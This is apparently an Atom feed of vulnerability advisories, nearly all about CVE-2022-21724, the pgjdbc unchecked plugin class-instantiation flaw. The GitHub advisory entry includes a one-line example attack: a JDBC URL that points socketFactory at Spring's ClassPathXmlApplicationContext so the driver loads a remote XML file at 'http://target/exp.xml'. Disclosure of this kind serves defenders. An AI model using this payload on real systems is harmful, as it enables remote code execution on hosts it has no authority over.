<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-02T16:27:12.571485+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2022-00821</id>
    <title>bdu:2022-00821</title>
    <updated>2026-10-02T16:27:12.599868+00:00</updated>
    <content>bdu:2022-00821</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2022-00821"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2022-avi-106</id>
    <title>certfr-2022-avi-106 — Une vulnérabilité a été découverte dans PostgreSQL JDBC. Elle permet à
un attaquant de provoquer une exécution de code…</title>
    <updated>2026-10-02T16:27:12.599943+00:00</updated>
    <content>certfr-2022-avi-106</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2022-avi-106"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-237410</id>
    <title>EUVD-2026-237410</title>
    <updated>2026-10-02T16:27:12.599979+00:00</updated>
    <content>EUVD-2026-237410</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-237410"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2022-21724</id>
    <title>fkie_cve-2022-21724</title>
    <updated>2026-10-02T16:27:12.600002+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2022-21724"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-v7wg-cpwc-24m4</id>
    <title>GHSA-v7wg-cpwc-24m4 — pgjdbc Does Not Check Class Instantiation when providing Plugin Classes</title>
    <updated>2026-10-02T16:27:12.600057+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Maven: org.postgresql:postgresql</p>
<p>### Impact</p>
<p>pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.</p>
<p>However, the driver did not verify if the class implements the expected interface before instantiating the class.</p>
<p>Here's an example attack using an out-of-the-box class from Spring Framework:</p>
<p>```
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&amp;socketFactoryArg=http://target/exp.xml");
```</p>
<p>The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-v7wg-cpwc-24m4"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2022-21724</id>
    <title>gsd-2022-21724</title>
    <updated>2026-10-02T16:27:12.600119+00:00</updated>
    <content>gsd-2022-21724</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2022-21724"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/oesa-2022-1535</id>
    <title>OESA-2022-1535 — postgresql-jdbc security update</title>
    <updated>2026-10-02T16:27:12.600141+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> openEuler:20.03-LTS-SP1: postgresql-jdbc, openEuler:20.03-LTS-SP2: postgresql-jdbc, openEuler:20.03-LTS-SP3: postgresql-jdbc</p>
<p>PostgreSQL JDBC Driver (PgJDBC for short) allows Java programs to connect to a PostgreSQL database using standard, database independent Java code. Is an open source JDBC driver written in Pure Java (Type 4), and communicates in the PostgreSQL native network protocol.

Security Fix(es):

pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.(CVE-2022-21724)</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/oesa-2022-1535"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2022:4623</id>
    <title>RHSA-2022:4623 — Red Hat Security Advisory: Red Hat build of Quarkus 2.7.5 release and security update</title>
    <updated>2026-10-02T16:27:12.600194+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>smallrye-health-ui: persistent cross-site scripting in endpoint protobuf-java: potential DoS in the parsing procedure for binary data gradle: repository content filters do not work in Settings pluginManagement gradle: local privilege escalation through system temporary directory gradle: information disclosure through temporary directory permissions netty: control chars in header names may lead to HTTP request smuggling quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2022:4623"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/suse-su-2022:2143-1</id>
    <title>SUSE-SU-2022:2143-1 — Recommended update for SUSE Manager 4.1.15 Release Notes</title>
    <updated>2026-10-02T16:27:12.600251+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Recommended update for SUSE Manager 4.1.15 Release Notes</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/suse-su-2022:2143-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21724</id>
    <title>UBUNTU-CVE-2022-21724</title>
    <updated>2026-10-02T16:27:12.600294+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:14.04:LTS: libpgjava, Ubuntu:16.04:LTS: libpgjava, Ubuntu:Pro:18.04:LTS: libpgjava, Ubuntu:Pro:20.04:LTS: libpgjava, Ubuntu:22.04:LTS: libpgjava</p>
<p>pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21724"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2022-0416</id>
    <title>WID-SEC-W-2022-0416 — PostgreSQL JDBC Treiber: Schwachstelle ermöglicht Codeausführung</title>
    <updated>2026-10-02T16:27:12.600349+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein entfernter, authentisierter Angreifer kann eine Schwachstelle im PostgreSQL JDBC Treiber ausnutzen, um beliebigen Programmcode auszuführen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2022-0416"/>
  </entry>
</feed>
